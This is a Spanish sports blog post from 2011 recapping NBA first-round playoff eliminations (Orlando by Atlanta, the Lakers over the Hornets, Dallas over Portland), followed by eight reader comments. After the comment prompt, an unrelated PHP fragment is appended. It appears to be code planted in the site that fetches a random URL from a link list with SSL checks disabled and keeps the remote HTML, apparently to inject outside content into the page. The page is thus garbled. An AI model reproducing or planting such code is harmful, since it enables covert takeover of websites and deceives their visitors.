PLayoffs (28/04/2011): Orlando eliminado

29 de April de 2011 por TheDeerHunter

Se confirmó lo que es hasta el momento la sorpresa de 1ª ronda. También el fracaso del último traspaso de Orlando y, por último, otro punto más en el “debe” de la cuenta de resultados de Stan Van Gundy, puede que el definitivo.

Dwight Howard, como durante toda la serie, volvió a estar superlativo, inmune a las agresiones de Pachulia. Un gran líder si hubiera habido alguien para seguirlo. Decepción mayúscula con Richardson, Brandon Bass y Jameer Nelson. Turkoglu estuvo menos horrible que otros días, pero tampoco hizo nada del otro jueves volviéndose a jugar la decisiva con resultado predeciblemente malo. Arenas, Redick, Anderson… no han estado prácticamente en ningún momento y no esperábamos que estuviesen ahora. ¿Y qué vamos a decir de Quentin? Con todo tuvieron su opción cuando se les escapó un rebote entre los dedos con uno abajo a falta de 15 segundos (81-84).

Crawford y Joe Johnson les hicieron tanto daño como durante toda la serie. Hinrich, Pachulia y Marvin Williams cumplieron (el primero terminó lesionado, por cierto). Horford y Josh Smith estuvieron flojos, pero el partido acabó bien para ellos y al final no hizo falta mayor contribución por su parte. Los Hawks han sabido aislar a Supermán. Al contrario que Orlando, han sabido jugar bien sus bazas y hacer valer sus virtudes. Les espera el campeón de la regular.

Otras dos series del Oeste se cerraron, definiéndose el primer cruce de segunda ronda en la conferencia. Los Lakers lograron por fin hacer hincar la rodilla a Chris Paul y resolvieron cómodamente en el 6º. Paul rozó el triple doble, pero no pudo anotar. El mejor de su equipo en ese aspecto fue Landry que se ha cebado gracias a la peor serie de Gasol que se recuerda, aunque anoche finalmente maquillara su desempeño. Con Bynum y Odom a un excelente nivel volvieron a llevarse el duelo por dentro. Con CP3 controlado y eljuego interior perdido los Hornets no tuvieron nada que hacer, y eso que Kobe sigue renqueante (98-80).

El rival de los campeones serán los Mavs. Nowitzki y Terry activaron el modo “hacer sangre” y los sistemas defensivos de los Blazers se mostraron ineficaces ante ellos. Gerald Wallace se dejó la vida para evitar otra nueva eliminación en primera ronda como Aldridge y Matthews pero en esta ocasión falló André Miller… y el resto de los Blazers (103-96). Maravilla la gestión de casos como el de Batum. Anoche 12 minutos y 0 puntos. Ellos verán… El año que viene si eso.

PREMIOS

MVP: Cuando el alemán se pone a jugar es indefendible. Que le pregunte a los Blazers, que cayeron ante los 33 puntos (11 de 17) y 11 rebotes de Dirk Nowitzki.

Sorpresa: JJ Barea sigue demostrando ser un base muy interesante. En 15 minutos, 7 puntos, 4 rebotes y 4 asistencia. A mi me gustaría tenerlo en mi banquillo.

Decepción: Los Magic han caído de la peor forma posible, mostrando un imagen muy, muy pobre. Veremos como se planifican los años venideros.

Esfuerzo en vano: Gerald Wallace (32 puntos y 12 rebotes) y Dwight Howard (25 puntos y 15 rebotes) se dejaron la piel para evitar las eliminaciones de sus equipos pero estuvieron demasiado solos.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. telekoman dice:
    #1

    Que desastre para Orlando. De todas formas, que equipo más desaprovechado. ¿Cuánto le falta de contrato a Howard? ¿Y cuánto cobra? Es una pena que por espacio salarial seguramente no sería posible, pero imaginaros el equipito que se podría montar: Kobe, Pau y Howard. En fin, baloncesto ficción.

      Citar

  2. Uno cualquiera dice:
    #2

    Le queda el año que viene (2011/2012) y una Player Option para el 2012/2013, que se dice que no firmará para irse a cualquier otro equipo (ya han sonado muchos y con razón xD)

    Cuando tengáis alguna duda acerca de salarios, visitad: http://hoopshype.com/salaries.htm

      Citar

  3. CAMPO2 dice:
    #3

    La primera en todo el hocico, antes de play-offs dije que Orlando daría la sorpresa de manera positiva

      Citar

  4. CAMPO2 dice:
    #4

    y ya voy abriendo la boca por lo que dije de Boston para tragarme mis palabras

      Citar

  5. Fer dice:
    #5

    Buenas a todos,
    como Pau no espabile un poco, Dirk se lo va a comer con papas…
    En cuanto a un trade para llevar a Howard a los Lakers, yo sí que lo veo bastante factible, teniendo en cuenta que le queda un año y que no querrá renovar seguramente, y es cambiándolo a pelo por Bynum (creo que se puede, según el Trade Machine de ESPN). Para Orlando, sabiendo que se quedarían sin nada, creo que es un buen negocio, y para los Lakers sería increíble.
    Otra opción sería por Pau también a pelo, sería imposible pisar una zona en la que jugasen juntos Howard y Bynum, aunque la dupla Pau-Howard estaría más compensada.
    Incluso podrían intentar pescar a Nelson, aunque eso sería más dificil.
    Si fuera Orlando, me quedaba con Bynum antes que con cualquier cosa que le pudiera ofrecer NY, que es “el otro” equipo que suena para Howard…
    Saludosss

      Citar

  6. TheDeerHunter dice:
    #6

    Yo a Nelson no lo querría para los Lakers ni regalado.
    Lo otro… lo sigo viendo más que imposible, porque después hay que renovar a Howard, sin excepción Bird ni leñes.
    Poniéndonos a especular en plan fantasía total la dupla Bynum-Howard también sería incompatible y no tengo ni idea de porqué querrían tener a Pau los Magic para hacer una reconstrucción.

      Citar

  7. JHC dice:
    #7

    weno pasaron mis Hawks que han echo una gran serie ahora toca Bulls lo veo mucho más dificil aunque no imposible, esperemos plantar cara al mejor equipo de la regular season parecen que contra Indiana jugaron a medio gas haber si siguen así y le damos más de un susto

      Citar

  8. GreenPride dice:
    #8

    Pues anoche dia de cerrar eliminatorias.
    En Atlanta, Orlando cayó presa de sus propias limitaciones. Está claro que para llegar lejos los llegados en el trade tenían que jugar a su mejor nivel y ni Arenas ni Turkoglu son la mitad de jugadores de lo que un día fueron. Por su parte Howard se ha dejado la vida para intentar sacar el ataque adelante pero aunque ha mejorado es difícil que pueda llevar el peso ofensivo sin ayuda. Nelson ha sido otro que ha jugado por debajo de su mejor nivel así que un equipo al que el año pasado arrasaron como los Hawks los ha eliminado este año casi con las mismas armas. Por Atlanta, buen partido de JJ y Crawford y buena defensa interior en general aunque a mí la verdad es que me parece que los Bulls se los van a merendar en la siguiente ronda.
    En el Oeste los Lakers volvieron a hacer papilla en la zona a los Hornets. Casi da cosa ver cómo los angelinos practicamente tocaban todos los rebotes ofensivos ante la impotencia de los Hornets. Gran dominio de Bynum acompañado por Pau en la segunda parte. Es cierto que Kobe sigue regular pero no creo que nadie dude de que cuando lleguen los momentos más difíciles estará ahí como siempre. Dejan alguna duda sobre todo defendiendo a los base contrarios lo que no es nada nuevo y a partir de ahora veremos si de verdad están preparados para el threepeat tras una temporada de signos contradictorios.
    Su rival en las semis de conferencia serán los Mavs y estos sí que deberían ser un hueso duro de verdad. Otra vez se dejaron remontar los Mavs que como siempre ofrecen dudas en cuanto a no venirse abajo en las situaciones comprometidas pero tienen equipo para hacer sudar a los Lakers. Fenomenal partido de Terry y genial Dirk tomando responsabilidades para su equipo. Portland luchó hasta el final, con un Gerald Wallace que ha sido de lo mejor de su equipo y eso que estaba recién llegado, pero esta vez no hubo Roy-milagro y a pesar del buen partido de Aldridge se quedan fuera. Veremos si la suerte y las lesiones respetan en el futuro a esta franquicia con tan mala suerte. Por cierto, Rudy tirando a mal en la serie y con pocos minutos, tiene que salir de Portland pero ya para ver si puede seguir en la NBA o debe volver a Europa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>